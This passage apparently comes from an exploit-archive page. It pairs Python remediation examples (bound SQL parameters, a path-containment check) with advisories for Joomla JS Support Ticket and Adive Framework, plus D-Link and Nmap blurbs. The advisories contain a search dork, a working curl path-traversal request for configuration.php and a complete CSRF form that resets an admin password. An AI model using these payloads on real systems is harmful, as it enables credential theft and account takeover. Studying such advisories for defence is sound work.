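The root cause on line 441 above, and of the JoomSport `sid` injection earlier on this page, is the same: a request value concatenated into the query text. As an added Python example, not the component's code, both lookups are shown in their concatenating form beside a bound-parameter form, run against a constructed in-memory SQLite database with the payloads the two advisories use.

```python
import sqlite3


def make_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the two tables the advisories touch."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE fieldsordering (field TEXT, fieldtitle TEXT)")
    con.executemany("INSERT INTO fieldsordering VALUES (?, ?)",
                    [("country", "Country"), ("city", "City"), ("internal_note", "Internal")])
    con.execute("CREATE TABLE seasons (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO seasons VALUES (?, ?)",
                    [(1, "new-yorkers"), (2, "season-two")])
    return con


def field_lookup_vulnerable(con, childfield: str) -> list:
    """String concatenation, the shape of line 441 in admin/models/userfields.php:
    a quote in childfield rewrites the WHERE clause."""
    sql = "SELECT field FROM fieldsordering WHERE field = '" + childfield + "'"
    return [row[0] for row in con.execute(sql)]


def field_lookup_safe(con, childfield: str) -> list:
    """Bound parameter: the driver passes the value separately, so it is data, never SQL."""
    return [row[0] for row in con.execute(
        "SELECT field FROM fieldsordering WHERE field = ?", (childfield,))]


def season_lookup_vulnerable(con, sid: str) -> list:
    """Numeric value concatenated unquoted, the shape the JoomSport sid payload implies."""
    return [row[0] for row in con.execute("SELECT name FROM seasons WHERE id = " + sid)]


def is_integer_sid(sid: str) -> bool:
    """Type check for an id parameter: an optional sign followed by digits only."""
    return sid.lstrip("-").isdigit()


def season_lookup_safe(con, sid: str) -> list:
    """Validate the type, then bind the integer; a boolean payload is rejected before any query."""
    if not is_integer_sid(sid):
        raise ValueError("sid must be an integer")
    return [row[0] for row in con.execute("SELECT name FROM seasons WHERE id = ?", (int(sid),))]
```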

Joomla JS Support Ticket 1.1.5 Arbitrary File Download


Joomla JS Support Ticket component version 1.1.5 suffers from an arbitrary file download vulnerability.


MD5 | 0ec3051586819324a39f5a84672a22f8

#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: http://joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 1411 in file admin/models/ticket.php

```php
1382 function getDownloadAttachmentByName($file_name,$id){
1383     if(empty($file_name)) return false;
1384     if(!is_numeric($id)) return false;
1385     $db = JFactory::getDbo();
1386     $filename = str_replace('', '_',$file_name);
1387     $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
1388     $db->setQuery($query);
1389     $foldername = $db->loadResult();
1390
1391     $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
1392     $base = JPATH_BASE;
1393     if(JFactory::getApplication()->isAdmin()){
1394         $base = substr($base, 0, strlen($base) - 14); //remove administrator
1395     }
1396     $path = $base.'/'.$datadirectory;
1397     $path = $path . '/attachmentdata';
1398     $path = $path . '/ticket/' . $foldername;
1399     $file = $path . '/' . $filename;
1400
1401     header('Content-Description: File Transfer');
1402     header('Content-Type: application/octet-stream');
1403     header('Content-Disposition: attachment; filename=' . basename($file));
1404     header('Content-Transfer-Encoding: binary');
1405     header('Expires: 0');
1406     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
1407     header('Pragma: public');
1408     header('Content-Length: ' . filesize($file));
1409     //ob_clean();
1410     flush();
1411     readfile($file); //!!!
1412     exit();
1413     exit;
1414 }
```

#####################################
#PoC:
#####################################
$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
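Both this download routine and the Aptana Jaxer source viewer earlier on the page hand a request-supplied name to a file read after joining it onto a fixed directory, with no check that the result stays inside that directory. As an added Python example, not the component's code: a resolver in the shape of `getDownloadAttachmentByName` (base/attachmentdata/ticket/folder/name) that rejects a non-bare file name and then verifies containment of the resolved path, tried against a throwaway directory tree built for the example.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would leave the attachment root."""


def resolve_attachment(base_dir: str, ticket_folder: str, file_name: str) -> str:
    """Return the absolute path of <base>/attachmentdata/ticket/<folder>/<name>,
    or raise TraversalError if either component escapes the attachment root."""
    # The web server normally decodes %2f for us; decode here so an encoded
    # request like the Jaxer PoC is checked in its decoded form.
    file_name = unquote(file_name)
    # First gate: the name must be a bare file name, no separators, no '..'
    if not file_name or os.path.basename(file_name) != file_name or file_name in (".", ".."):
        raise TraversalError("file name must be a bare name: %r" % file_name)
    # Second gate: resolve symlinks and '..' in the whole path, then check containment.
    # This also catches a traversing folder value read back from the database.
    root = os.path.realpath(os.path.join(base_dir, "attachmentdata", "ticket"))
    candidate = os.path.realpath(os.path.join(root, ticket_folder, file_name))
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError("path escapes attachment root: %r" % candidate)
    return candidate


def demo_results() -> dict:
    """Build a throwaway tree and try the inputs from the two advisories (constructed sample)."""
    base = os.path.realpath(tempfile.mkdtemp())
    legit_dir = os.path.join(base, "attachmentdata", "ticket", "42")
    os.makedirs(legit_dir)
    open(os.path.join(legit_dir, "report.pdf"), "w").close()
    open(os.path.join(base, "configuration.php"), "w").close()
    attempts = {
        "legit": ("42", "report.pdf"),
        "joomla_traversal": ("42", "../../../configuration.php"),
        "jaxer_style_encoded": ("42", "..%2f..%2f..%2f..%2fetc%2fpasswd"),
        "folder_traversal": ("../..", "configuration.php"),
    }
    out = {}
    for label, (folder, name) in attempts.items():
        try:
            out[label] = "served:" + os.path.relpath(resolve_attachment(base, folder, name), base)
        except TraversalError:
            out[label] = "blocked"
    return out
```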

Adive Framework 2.0.7 Cross Site Request Forgery


Adive Framework version 2.0.7 suffers from a cross site request forgery vulnerability.


MD5 | 33360d4da6f14944b2b0aba3dddeff90

# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346

# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.

# 2. Proof Of Concept (CODE):

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/adive/admin/config" method="POST">
<input type="hidden" name="userName" value="admin" />
<input type="hidden" name="confPermissions" value="1" />
<input type="hidden" name="pass" value="1234" />
<input type="hidden" name="cpass" value="1234" />
<input type="hidden" name="invokeType" value="web" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q

D-Link DIR-600M Wireless N 150 Home Router Access Bypass


A remote vulnerability was discovered in the D-Link DIR-600M Wireless N 150 Home Router in multiple firmware versions. The vulnerability provides unauthenticated remote access to the router's WAN configuration page, "wan.htm", which leads to disclosure of sensitive user information including but not limited to the PPPoE and DNS configuration, and also allows the configuration settings to be changed. A Metasploit module and NSE scripts are included.


MD5 | 4b99c969adcc494c0182664d23ba5a61


Nmap Port Scanner 7.80


Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.


MD5 | 6ebfd22b0a7abdd67ed6acd361c7136d

